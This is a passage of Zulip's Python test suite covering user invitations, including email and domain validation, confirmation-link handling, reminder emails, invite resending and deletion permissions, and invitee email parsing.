"Some emails did not validate, so we didn't send any invitations.",
)
self.check_sent_emails([])
self.assert_json_error(
self.invite("", ["Denmark"]), "You must specify at least one email address."
)
self.check_sent_emails([])
def test_guest_user_invitation(self) -> None:
"""
Guest user can't invite new users
"""
self.login("polonius")
invitee = "alice-test@zulip.com"
self.assert_json_error(self.invite(invitee, ["Denmark"]), "Not allowed for guest users")
self.assertEqual(find_key_by_email(invitee), None)
self.check_sent_emails([])
def test_invalid_stream(self) -> None:
"""
Tests inviting to a non-existent stream.
"""
self.login("hamlet")
self.assert_json_error(
self.invite("iago-test@zulip.com", ["NotARealStream"]),
f"Stream does not exist with id: {self.INVALID_STREAM_ID}. No invites were sent.",
)
self.check_sent_emails([])
def test_invite_existing_user(self) -> None:
"""
If you invite an address already using Zulip, no invitation is sent.
"""
self.login("hamlet")
hamlet_email = "hAmLeT@zUlIp.com"
result = self.invite(hamlet_email, ["Denmark"])
self.assert_json_error(result, "We weren't able to invite anyone.")
self.assertFalse(
PreregistrationUser.objects.filter(email__iexact=hamlet_email).exists(),
)
self.check_sent_emails([])
def normalize_string(self, s: str) -> str:
s = s.strip()
return re.sub(r"\s+", " ", s)
def test_invite_links_in_name(self) -> None:
"""
If you invite an address already using Zulip, no invitation is sent.
"""
hamlet = self.example_user("hamlet")
self.login_user(hamlet)
# Test we properly handle links in user full names
do_change_full_name(hamlet, "</a> https://www.google.com", hamlet)
result = self.invite("newuser@zulip.com", ["Denmark"])
self.assert_json_success(result)
self.check_sent_emails(["newuser@zulip.com"])
from django.core.mail import outbox
body = self.normalize_string(outbox[0].alternatives[0][0])
# Verify that one can't get Zulip to send invitation emails
# that third-party products will linkify using the full_name
# field, because we've included that field inside the mailto:
# link for the sender.
self.assertIn(
'<a href="mailto:hamlet@zulip.com" style="color:#46aa8f; text-decoration:underline"></a> https://www.google.com (hamlet@zulip.com)</a> wants',
body,
)
# TODO: Ideally, this test would also test the Invitation
# Reminder email generated, but the test setup for that is
# annoying.
def test_invite_some_existing_some_new(self) -> None:
"""
If you invite a mix of already existing and new users, invitations are
only sent to the new users.
"""
self.login("hamlet")
existing = [self.example_email("hamlet"), "othello@zulip.com"]
new = ["foo-test@zulip.com", "bar-test@zulip.com"]
invitee_emails = "\n".join(existing + new)
self.assert_json_error(
self.invite(invitee_emails, ["Denmark"]),
"Some of those addresses are already using Zulip, \
so we didn't send them an invitation. We did send invitations to everyone else!",
)
# We only created accounts for the new users.
for email in existing:
self.assertRaises(
PreregistrationUser.DoesNotExist,
lambda: PreregistrationUser.objects.get(email=email),
)
for email in new:
self.assertTrue(PreregistrationUser.objects.get(email=email))
# We only sent emails to the new users.
self.check_sent_emails(new)
prereg_user = PreregistrationUser.objects.get(email="foo-test@zulip.com")
self.assertEqual(prereg_user.email, "foo-test@zulip.com")
def test_invite_outside_domain_in_closed_realm(self) -> None:
"""
In a realm with `emails_restricted_to_domains = True`, you can't invite people
with a different domain from that of the realm or your e-mail address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = True
zulip_realm.save()
self.login("hamlet")
external_address = "foo@example.com"
self.assert_json_error(
self.invite(external_address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.",
)
def test_invite_using_disposable_email(self) -> None:
"""
In a realm with `disallow_disposable_email_addresses = True`, you can't invite
people with a disposable domain.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.disallow_disposable_email_addresses = True
zulip_realm.save()
self.login("hamlet")
external_address = "foo@mailnator.com"
self.assert_json_error(
self.invite(external_address, ["Denmark"]),
"Some emails did not validate, so we didn't send any invitations.",
)
def test_invite_outside_domain_in_open_realm(self) -> None:
"""
In a realm with `emails_restricted_to_domains = False`, you can invite people
with a different domain from that of the realm or your e-mail address.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.save()
self.login("hamlet")
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
def test_invite_outside_domain_before_closing(self) -> None:
"""
If you invite someone with a different domain from that of the realm
when `emails_restricted_to_domains = False`, but `emails_restricted_to_domains` later
changes to true, the invitation should succeed but the invitee's signup
attempt should fail.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.save()
self.login("hamlet")
external_address = "foo@example.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.emails_restricted_to_domains = True
zulip_realm.save()
result = self.submit_reg_form_for_user("foo@example.com", "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("only allows users with email addresses", result)
def test_disposable_emails_before_closing(self) -> None:
"""
If you invite someone with a disposable email when
`disallow_disposable_email_addresses = False`, but
later changes to true, the invitation should succeed
but the invitee's signup attempt should fail.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.disallow_disposable_email_addresses = False
zulip_realm.save()
self.login("hamlet")
external_address = "foo@mailnator.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.disallow_disposable_email_addresses = True
zulip_realm.save()
result = self.submit_reg_form_for_user("foo@mailnator.com", "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please sign up using a real email address.", result)
def test_invite_with_email_containing_plus_before_closing(self) -> None:
"""
If you invite someone with an email containing plus when
`emails_restricted_to_domains = False`, but later change
`emails_restricted_to_domains = True`, the invitation should
succeed but the invitee's signup attempt should fail as
users are not allowed to sign up using email containing +
when the realm is restricted to domain.
"""
zulip_realm = get_realm("zulip")
zulip_realm.emails_restricted_to_domains = False
zulip_realm.save()
self.login("hamlet")
external_address = "foo+label@zulip.com"
self.assert_json_success(self.invite(external_address, ["Denmark"]))
self.check_sent_emails([external_address])
zulip_realm.emails_restricted_to_domains = True
zulip_realm.save()
result = self.submit_reg_form_for_user(external_address, "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response(
"Zulip Dev, does not allow signups using emails\n that contains +", result
)
def test_invalid_email_check_after_confirming_email(self) -> None:
self.login("hamlet")
email = "test@zulip.com"
self.assert_json_success(self.invite(email, ["Denmark"]))
obj = Confirmation.objects.get(confirmation_key=find_key_by_email(email))
prereg_user = obj.content_object
prereg_user.email = "invalid.email"
prereg_user.save()
result = self.submit_reg_form_for_user(email, "password")
self.assertEqual(result.status_code, 200)
self.assert_in_response(
"The email address you are trying to sign up with is not valid", result
)
def test_invite_with_non_ascii_streams(self) -> None:
"""
Inviting someone to streams with non-ASCII characters succeeds.
"""
self.login("hamlet")
invitee = "alice-test@zulip.com"
stream_name = "hümbüǵ"
# Make sure we're subscribed before inviting someone.
self.subscribe(self.example_user("hamlet"), stream_name)
self.assert_json_success(self.invite(invitee, [stream_name]))
def test_invitation_reminder_email(self) -> None:
from django.core.mail import outbox
# All users belong to zulip realm
referrer_name = "hamlet"
current_user = self.example_user(referrer_name)
self.login_user(current_user)
invitee_email = self.nonreg_email("alice")
self.assert_json_success(self.invite(invitee_email, ["Denmark"]))
self.assertTrue(find_key_by_email(invitee_email))
self.check_sent_emails([invitee_email])
data = {"email": invitee_email, "referrer_email": current_user.email}
invitee = PreregistrationUser.objects.get(email=data["email"])
referrer = self.example_user(referrer_name)
link = create_confirmation_link(invitee, Confirmation.INVITATION)
context = common_context(referrer)
context.update(
activate_url=link,
referrer_name=referrer.full_name,
referrer_email=referrer.email,
referrer_realm_name=referrer.realm.name,
)
with self.settings(EMAIL_BACKEND="django.core.mail.backends.console.EmailBackend"):
email = data["email"]
send_future_email(
"zerver/emails/invitation_reminder",
referrer.realm,
to_emails=[email],
from_address=FromAddress.no_reply_placeholder,
context=context,
)
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now()
)
self.assert_length(email_jobs_to_deliver, 1)
email_count = len(outbox)
for job in email_jobs_to_deliver:
deliver_scheduled_emails(job)
self.assert_length(outbox, email_count + 1)
self.assertEqual(self.email_envelope_from(outbox[-1]), settings.NOREPLY_EMAIL_ADDRESS)
self.assertIn(FromAddress.NOREPLY, self.email_display_from(outbox[-1]))
# Now verify that signing up clears invite_reminder emails
with self.settings(EMAIL_BACKEND="django.core.mail.backends.console.EmailBackend"):
email = data["email"]
send_future_email(
"zerver/emails/invitation_reminder",
referrer.realm,
to_emails=[email],
from_address=FromAddress.no_reply_placeholder,
context=context,
)
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER
)
self.assert_length(email_jobs_to_deliver, 1)
self.register(invitee_email, "test")
email_jobs_to_deliver = ScheduledEmail.objects.filter(
scheduled_timestamp__lte=timezone_now(), type=ScheduledEmail.INVITATION_REMINDER
)
self.assert_length(email_jobs_to_deliver, 0)
def test_no_invitation_reminder_when_link_expires_quickly(self) -> None:
self.login("hamlet")
# Check invitation reminder email is scheduled with 4 day link expiry
with self.settings(INVITATION_LINK_VALIDITY_DAYS=4):
self.invite("alice@zulip.com", ["Denmark"])
self.assertEqual(
ScheduledEmail.objects.filter(type=ScheduledEmail.INVITATION_REMINDER).count(), 1
)
# Check invitation reminder email is not scheduled with 3 day link expiry
with self.settings(INVITATION_LINK_VALIDITY_DAYS=3):
self.invite("bob@zulip.com", ["Denmark"])
self.assertEqual(
ScheduledEmail.objects.filter(type=ScheduledEmail.INVITATION_REMINDER).count(), 1
)
# make sure users can't take a valid confirmation key from another
# pathway and use it with the invitation URL route
def test_confirmation_key_of_wrong_type(self) -> None:
email = self.nonreg_email("alice")
realm = get_realm("zulip")
inviter = self.example_user("iago")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
url = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = url.split("/")[-1]
# Mainly a test of get_object_from_key, rather than of the invitation pathway
with self.assertRaises(ConfirmationKeyException) as cm:
get_object_from_key(registration_key, Confirmation.INVITATION)
self.assertEqual(cm.exception.error_type, ConfirmationKeyException.DOES_NOT_EXIST)
# Verify that using the wrong type doesn't work in the main confirm code path
email_change_url = create_confirmation_link(prereg_user, Confirmation.EMAIL_CHANGE)
email_change_key = email_change_url.split("/")[-1]
url = "/accounts/do_confirm/" + email_change_key
result = self.client_get(url)
self.assert_in_success_response(
["Whoops. We couldn't find your confirmation link in the system."], result
)
def test_confirmation_expired(self) -> None:
email = self.nonreg_email("alice")
realm = get_realm("zulip")
inviter = self.example_user("iago")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
url = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = url.split("/")[-1]
conf = Confirmation.objects.filter(confirmation_key=registration_key).first()
conf.date_sent -= datetime.timedelta(weeks=3)
conf.save()
target_url = "/" + url.split("/", 3)[3]
result = self.client_get(target_url)
self.assert_in_success_response(
["Whoops. The confirmation link has expired or been deactivated."], result
)
def test_send_more_than_one_invite_to_same_user(self) -> None:
self.user_profile = self.example_user("iago")
streams = []
for stream_name in ["Denmark", "Scotland"]:
streams.append(get_stream(stream_name, self.user_profile.realm))
do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
prereg_user = PreregistrationUser.objects.get(email="foo@zulip.com")
do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
do_invite_users(self.user_profile, ["foo@zulip.com"], streams, False)
# Also send an invite from a different realm.
lear = get_realm("lear")
lear_user = self.lear_user("cordelia")
do_invite_users(lear_user, ["foo@zulip.com"], [], False)
invites = PreregistrationUser.objects.filter(email__iexact="foo@zulip.com")
self.assert_length(invites, 4)
do_create_user(
"foo@zulip.com",
"password",
self.user_profile.realm,
"full name",
prereg_user=prereg_user,
acting_user=None,
)
accepted_invite = PreregistrationUser.objects.filter(
email__iexact="foo@zulip.com", status=confirmation_settings.STATUS_ACTIVE
)
revoked_invites = PreregistrationUser.objects.filter(
email__iexact="foo@zulip.com", status=confirmation_settings.STATUS_REVOKED
)
# If a user was invited more than once, when it accepts one invite and register
# the others must be canceled.
self.assert_length(accepted_invite, 1)
self.assertEqual(accepted_invite[0].id, prereg_user.id)
expected_revoked_invites = set(invites.exclude(id=prereg_user.id).exclude(realm=lear))
self.assertEqual(set(revoked_invites), expected_revoked_invites)
self.assertEqual(
PreregistrationUser.objects.get(email__iexact="foo@zulip.com", realm=lear).status, 0
)
def test_confirmation_obj_not_exist_error(self) -> None:
"""Since the key is a param input by the user to the registration endpoint,
if it inserts an invalid value, the confirmation object won't be found. This
tests if, in that scenario, we handle the exception by redirecting the user to
the confirmation_link_expired_error page.
"""
email = self.nonreg_email("alice")
password = "password"
realm = get_realm("zulip")
inviter = self.example_user("iago")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = "invalid_confirmation_key"
url = "/accounts/register/"
response = self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_nme": "alice"}
)
self.assertEqual(response.status_code, 404)
self.assert_in_response("The registration link has expired or is not valid.", response)
registration_key = confirmation_link.split("/")[-1]
response = self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_nme": "alice"}
)
self.assert_in_success_response(["We just need you to do one last thing."], response)
response = self.submit_reg_form_for_user(email, password, key=registration_key)
self.assertEqual(response.status_code, 302)
def test_validate_email_not_already_in_realm(self) -> None:
email = self.nonreg_email("alice")
password = "password"
realm = get_realm("zulip")
inviter = self.example_user("iago")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split("/")[-1]
url = "/accounts/register/"
self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"}
)
self.submit_reg_form_for_user(email, password, key=registration_key)
url = "/accounts/register/"
response = self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"}
)
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.url,
reverse("login") + "?" + urlencode({"email": email, "already_registered": 1}),
)
def test_confirmation_link_in_manual_license_plan(self) -> None:
inviter = self.example_user("iago")
realm = get_realm("zulip")
email = self.nonreg_email("alice")
realm = get_realm("zulip")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split("/")[-1]
url = "/accounts/register/"
self.client_post(
url, {"key": registration_key, "from_confirmation": 1, "full_name": "alice"}
)
response = self.submit_reg_form_for_user(email, "password", key=registration_key)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "http://zulip.testserver/")
self.subscribe_realm_to_monthly_plan_on_manual_license_management(realm, 5, 5)
email = self.nonreg_email("bob")
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split("/")[-1]
url = "/accounts/register/"
self.client_post(url, {"key": registration_key, "from_confirmation": 1, "full_name": "bob"})
response = self.submit_reg_form_for_user(email, "password", key=registration_key)
self.assert_in_success_response(
["New members cannot join this organization because all Zulip licenses are"], response
)
class InvitationsTestCase(InviteUserBase):
def test_do_get_user_invites(self) -> None:
self.login("iago")
user_profile = self.example_user("iago")
hamlet = self.example_user("hamlet")
othello = self.example_user("othello")
prereg_user_one = PreregistrationUser(email="TestOne@zulip.com", referred_by=user_profile)
prereg_user_one.save()
prereg_user_two = PreregistrationUser(email="TestTwo@zulip.com", referred_by=user_profile)
prereg_user_two.save()
prereg_user_three = PreregistrationUser(email="TestThree@zulip.com", referred_by=hamlet)
prereg_user_three.save()
prereg_user_four = PreregistrationUser(email="TestFour@zulip.com", referred_by=othello)
prereg_user_four.save()
prereg_user_other_realm = PreregistrationUser(
email="TestOne@zulip.com", referred_by=self.mit_user("sipbtest")
)
prereg_user_other_realm.save()
multiuse_invite = MultiuseInvite.objects.create(
referred_by=user_profile, realm=user_profile.realm
)
create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
self.assert_length(do_get_user_invites(user_profile), 5)
self.assert_length(do_get_user_invites(hamlet), 1)
self.assert_length(do_get_user_invites(othello), 1)
def test_successful_get_open_invitations(self) -> None:
"""
A GET call to /json/invites returns all unexpired invitations.
"""
realm = get_realm("zulip")
days_to_activate = getattr(settings, "INVITATION_LINK_VALIDITY_DAYS", "Wrong")
active_value = getattr(confirmation_settings, "STATUS_ACTIVE", "Wrong")
self.assertNotEqual(days_to_activate, "Wrong")
self.assertNotEqual(active_value, "Wrong")
self.login("iago")
user_profile = self.example_user("iago")
prereg_user_one = PreregistrationUser(email="TestOne@zulip.com", referred_by=user_profile)
prereg_user_one.save()
expired_datetime = timezone_now() - datetime.timedelta(days=(days_to_activate + 1))
prereg_user_two = PreregistrationUser(email="TestTwo@zulip.com", referred_by=user_profile)
prereg_user_two.save()
PreregistrationUser.objects.filter(id=prereg_user_two.id).update(
invited_at=expired_datetime
)
prereg_user_three = PreregistrationUser(
email="TestThree@zulip.com", referred_by=user_profile, status=active_value
)
prereg_user_three.save()
hamlet = self.example_user("hamlet")
othello = self.example_user("othello")
multiuse_invite_one = MultiuseInvite.objects.create(referred_by=hamlet, realm=realm)
create_confirmation_link(multiuse_invite_one, Confirmation.MULTIUSE_INVITE)
multiuse_invite_two = MultiuseInvite.objects.create(referred_by=othello, realm=realm)
create_confirmation_link(multiuse_invite_two, Confirmation.MULTIUSE_INVITE)
confirmation = Confirmation.objects.last()
confirmation.date_sent = expired_datetime
confirmation.save()
result = self.client_get("/json/invites")
self.assertEqual(result.status_code, 200)
invites = orjson.loads(result.content)["invites"]
self.assert_length(invites, 2)
self.assertFalse(invites[0]["is_multiuse"])
self.assertEqual(invites[0]["email"], "TestOne@zulip.com")
self.assertTrue(invites[1]["is_multiuse"])
self.assertEqual(invites[1]["invited_by_user_id"], hamlet.id)
def test_successful_delete_invitation(self) -> None:
"""
A DELETE call to /json/invites/<ID> should delete the invite and
any scheduled invitation reminder emails.
"""
self.login("iago")
invitee = "DeleteMe@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
prereg_user = PreregistrationUser.objects.get(email=invitee)
# Verify that the scheduled email exists.
ScheduledEmail.objects.get(address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
result = self.client_delete("/json/invites/" + str(prereg_user.id))
self.assertEqual(result.status_code, 200)
error_result = self.client_delete("/json/invites/" + str(prereg_user.id))
self.assert_json_error(error_result, "No such invitation")
self.assertRaises(
ScheduledEmail.DoesNotExist,
lambda: ScheduledEmail.objects.get(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
),
)
def test_successful_member_delete_invitation(self) -> None:
"""
A DELETE call from member account to /json/invites/<ID> should delete the invite and
any scheduled invitation reminder emails.
"""
user_profile = self.example_user("hamlet")
self.login_user(user_profile)
invitee = "DeleteMe@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
# Verify that the scheduled email exists.
prereg_user = PreregistrationUser.objects.get(email=invitee, referred_by=user_profile)
ScheduledEmail.objects.get(address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
# Verify another non-admin can't delete
result = self.api_delete(
self.example_user("othello"), "/api/v1/invites/" + str(prereg_user.id)
)
self.assert_json_error(result, "Must be an organization administrator")
# Verify that the scheduled email still exists.
prereg_user = PreregistrationUser.objects.get(email=invitee, referred_by=user_profile)
ScheduledEmail.objects.get(address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER)
# Verify deletion works.
result = self.api_delete(user_profile, "/api/v1/invites/" + str(prereg_user.id))
self.assertEqual(result.status_code, 200)
result = self.api_delete(user_profile, "/api/v1/invites/" + str(prereg_user.id))
self.assert_json_error(result, "No such invitation")
self.assertRaises(
ScheduledEmail.DoesNotExist,
lambda: ScheduledEmail.objects.get(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
),
)
def test_delete_owner_invitation(self) -> None:
self.login("desdemona")
owner = self.example_user("desdemona")
invitee = "DeleteMe@zulip.com"
self.assert_json_success(
self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_OWNER"]
)
)
prereg_user = PreregistrationUser.objects.get(email=invitee)
result = self.api_delete(
self.example_user("iago"), "/api/v1/invites/" + str(prereg_user.id)
)
self.assert_json_error(result, "Must be an organization owner")
result = self.api_delete(owner, "/api/v1/invites/" + str(prereg_user.id))
self.assert_json_success(result)
result = self.api_delete(owner, "/api/v1/invites/" + str(prereg_user.id))
self.assert_json_error(result, "No such invitation")
self.assertRaises(
ScheduledEmail.DoesNotExist,
lambda: ScheduledEmail.objects.get(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
),
)
def test_delete_multiuse_invite(self) -> None:
"""
A DELETE call to /json/invites/multiuse<ID> should delete the
multiuse_invite.
"""
self.login("iago")
zulip_realm = get_realm("zulip")
multiuse_invite = MultiuseInvite.objects.create(
referred_by=self.example_user("hamlet"), realm=zulip_realm
)
create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
result = self.client_delete("/json/invites/multiuse/" + str(multiuse_invite.id))
self.assertEqual(result.status_code, 200)
self.assertIsNone(MultiuseInvite.objects.filter(id=multiuse_invite.id).first())
# Test that trying to double-delete fails
error_result = self.client_delete("/json/invites/multiuse/" + str(multiuse_invite.id))
self.assert_json_error(error_result, "No such invitation")
# Test deleting owner mutiuse_invite.
multiuse_invite = MultiuseInvite.objects.create(
referred_by=self.example_user("desdemona"),
realm=zulip_realm,
invited_as=PreregistrationUser.INVITE_AS["REALM_OWNER"],
)
create_confirmation_link(multiuse_invite, Confirmation.MULTIUSE_INVITE)
error_result = self.client_delete("/json/invites/multiuse/" + str(multiuse_invite.id))
self.assert_json_error(error_result, "Must be an organization owner")
self.login("desdemona")
result = self.client_delete("/json/invites/multiuse/" + str(multiuse_invite.id))
self.assert_json_success(result)
self.assertIsNone(MultiuseInvite.objects.filter(id=multiuse_invite.id).first())
# Test deleting multiuse invite from another realm
mit_realm = get_realm("zephyr")
multiuse_invite_in_mit = MultiuseInvite.objects.create(
referred_by=self.mit_user("sipbtest"), realm=mit_realm
)
create_confirmation_link(multiuse_invite_in_mit, Confirmation.MULTIUSE_INVITE)
error_result = self.client_delete(
"/json/invites/multiuse/" + str(multiuse_invite_in_mit.id)
)
self.assert_json_error(error_result, "No such invitation")
def test_successful_resend_invitation(self) -> None:
"""
A POST call to /json/invites/<ID>/resend should send an invitation reminder email
and delete any scheduled invitation reminder email.
"""
self.login("iago")
invitee = "resend_me@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
prereg_user = PreregistrationUser.objects.get(email=invitee)
# Verify and then clear from the outbox the original invite email
self.check_sent_emails([invitee])
from django.core.mail import outbox
outbox.pop()
# Verify that the scheduled email exists.
scheduledemail_filter = ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
)
self.assertEqual(scheduledemail_filter.count(), 1)
original_timestamp = scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
# Resend invite
result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assertEqual(
ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
).count(),
1,
)
# Check that we have exactly one scheduled email, and that it is different
self.assertEqual(scheduledemail_filter.count(), 1)
self.assertNotEqual(
original_timestamp, scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
)
self.assertEqual(result.status_code, 200)
error_result = self.client_post("/json/invites/" + str(9999) + "/resend")
self.assert_json_error(error_result, "No such invitation")
self.check_sent_emails([invitee])
def test_successful_member_resend_invitation(self) -> None:
"""A POST call from member a account to /json/invites/<ID>/resend
should send an invitation reminder email and delete any
scheduled invitation reminder email if they send the invite.
"""
self.login("hamlet")
user_profile = self.example_user("hamlet")
invitee = "resend_me@zulip.com"
self.assert_json_success(self.invite(invitee, ["Denmark"]))
# Verify hamlet has only one invitation (Member can resend invitations only sent by him).
invitation = PreregistrationUser.objects.filter(referred_by=user_profile)
self.assert_length(invitation, 1)
prereg_user = PreregistrationUser.objects.get(email=invitee)
# Verify and then clear from the outbox the original invite email
self.check_sent_emails([invitee])
from django.core.mail import outbox
outbox.pop()
# Verify that the scheduled email exists.
scheduledemail_filter = ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
)
self.assertEqual(scheduledemail_filter.count(), 1)
original_timestamp = scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
# Resend invite
result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assertEqual(
ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
).count(),
1,
)
# Check that we have exactly one scheduled email, and that it is different
self.assertEqual(scheduledemail_filter.count(), 1)
self.assertNotEqual(
original_timestamp, scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
)
self.assertEqual(result.status_code, 200)
error_result = self.client_post("/json/invites/" + str(9999) + "/resend")
self.assert_json_error(error_result, "No such invitation")
self.check_sent_emails([invitee])
self.logout()
self.login("othello")
invitee = "TestOne@zulip.com"
prereg_user_one = PreregistrationUser(email=invitee, referred_by=user_profile)
prereg_user_one.save()
prereg_user = PreregistrationUser.objects.get(email=invitee)
error_result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assert_json_error(error_result, "Must be an organization administrator")
def test_resend_owner_invitation(self) -> None:
self.login("desdemona")
invitee = "resend_owner@zulip.com"
self.assert_json_success(
self.invite(
invitee, ["Denmark"], invite_as=PreregistrationUser.INVITE_AS["REALM_OWNER"]
)
)
self.check_sent_emails([invitee])
scheduledemail_filter = ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
)
self.assertEqual(scheduledemail_filter.count(), 1)
original_timestamp = scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
# Test only organization owners can resend owner invitation.
self.login("iago")
prereg_user = PreregistrationUser.objects.get(email=invitee)
error_result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assert_json_error(error_result, "Must be an organization owner")
self.login("desdemona")
result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assert_json_success(result)
self.assertEqual(
ScheduledEmail.objects.filter(
address__iexact=invitee, type=ScheduledEmail.INVITATION_REMINDER
).count(),
1,
)
# Check that we have exactly one scheduled email, and that it is different
self.assertEqual(scheduledemail_filter.count(), 1)
self.assertNotEqual(
original_timestamp, scheduledemail_filter.values_list("scheduled_timestamp", flat=True)
)
def test_accessing_invites_in_another_realm(self) -> None:
inviter = UserProfile.objects.exclude(realm=get_realm("zulip")).first()
prereg_user = PreregistrationUser.objects.create(
email="email", referred_by=inviter, realm=inviter.realm
)
self.login("iago")
error_result = self.client_post("/json/invites/" + str(prereg_user.id) + "/resend")
self.assert_json_error(error_result, "No such invitation")
error_result = self.client_delete("/json/invites/" + str(prereg_user.id))
self.assert_json_error(error_result, "No such invitation")
def test_prereg_user_status(self) -> None:
email = self.nonreg_email("alice")
password = "password"
realm = get_realm("zulip")
inviter = UserProfile.objects.filter(realm=realm).first()
prereg_user = PreregistrationUser.objects.create(
email=email, referred_by=inviter, realm=realm
)
confirmation_link = create_confirmation_link(prereg_user, Confirmation.USER_REGISTRATION)
registration_key = confirmation_link.split("/")[-1]
result = self.client_post(
"/accounts/register/",
{"key": registration_key, "from_confirmation": "1", "full_name": "alice"},
)
self.assertEqual(result.status_code, 200)
confirmation = Confirmation.objects.get(confirmation_key=registration_key)
prereg_user = confirmation.content_object
self.assertEqual(prereg_user.status, 0)
result = self.submit_reg_form_for_user(email, password, key=registration_key)
self.assertEqual(result.status_code, 302)
prereg_user = PreregistrationUser.objects.get(email=email, referred_by=inviter, realm=realm)
self.assertEqual(prereg_user.status, confirmation_settings.STATUS_ACTIVE)
user = get_user_by_delivery_email(email, realm)
self.assertIsNotNone(user)
self.assertEqual(user.delivery_email, email)
class InviteeEmailsParserTests(ZulipTestCase):
def setUp(self) -> None:
super().setUp()
self.email1 = "email1@zulip.com"
self.email2 = "email2@zulip.com"
self.email3 = "email3@zulip.com"
def test_if_emails_separated_by_commas_are_parsed_and_striped_correctly(self) -> None:
emails_raw = f"{self.email1} ,{self.email2}, {self.email3}"
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_separated_by_newlines_are_parsed_and_striped_correctly(self) -> None:
emails_raw = f"{self.email1}\n {self.email2}\n {self.email3} "
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_from_email_client_separated_by_newlines_are_parsed_correctly(self) -> None:
emails_raw = (
f"Email One <{self.email1}>\nEmailTwo<{self.email2}>\nEmail Three<{self.email3}>"
)
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
def test_if_emails_in_mixed_style_are_parsed_correctly(self) -> None:
emails_raw = f"Email One <{self.email1}>,EmailTwo<{self.email2}>\n{self.email3}"
expected_set = {self.email1, self.email2, self.email3}
self.assertEqual(get_invitee_emails_set(emails_raw), expected_set)
class MultiuseInviteTest(ZulipTestCase):
def setUp(self) -> None:
super().setUp()
self.realm = get_realm("zulip")
self.realm.invite_required = True
self.realm.save()
def generate_multiuse_invite_link(
self, streams: Optional[List[Stream]] = None, date_sent: Optional[datetime.datetime] = None
) -> str:
